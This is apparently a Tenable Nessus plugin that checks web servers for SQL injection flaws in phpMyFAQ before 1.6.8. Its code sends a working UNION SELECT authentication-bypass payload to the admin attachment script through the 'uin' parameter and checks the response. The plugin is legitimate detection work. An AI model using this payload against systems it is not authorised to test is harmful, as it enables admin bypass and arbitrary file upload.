#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24001);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2006-6912", "CVE-2006-6913");
  script_bugtraq_id(21944, 21945);
  script_xref(name:"OSVDB", value:"32601");
  script_xref(name:"OSVDB", value:"32602");

  script_name(english:"phpMyFAQ < 1.6.8 Multiple SQL Injection Vulnerabilities");
  script_summary(english:"Checks for SQL injection in phpMyFAQ");

  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
several SQL injection issues. 

Description :

The version of phpMyFAQ on the remote host does not properly validate
input to the 'uin' parameter of several scripts before using it in
database queries.  An unauthenticated remote attacker may be able to
leverage these issues to launch SQL injection attacks against the
affected application, even bypass authentication and upload arbitrary
files that can then be run on the affected host subject to the
privileges of the web server user id. 

See also :

http://www.phpmyfaq.de/advisory_2006-12-15.php

Solution :

Upgrade to phpMyFAQ 1.6.8 or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("phpmyfaq_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/phpmyfaq"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # See if we can bypass authentication.
  exploit = string("1' UNION SELECT 'admin',", '"', SCRIPT_NAME, "' UNION SELECT 1,'admin',0,11111111111111111111111/*", '"/*');
  req = http_get(
    item:string(
      dir, "/admin/attachment.php?",
      "uin=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we can.
  if (
    'type="hidden" name="MAX_FILE_SIZE"' >< res &&
    string('type="hidden" name="uin" value="', exploit) >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
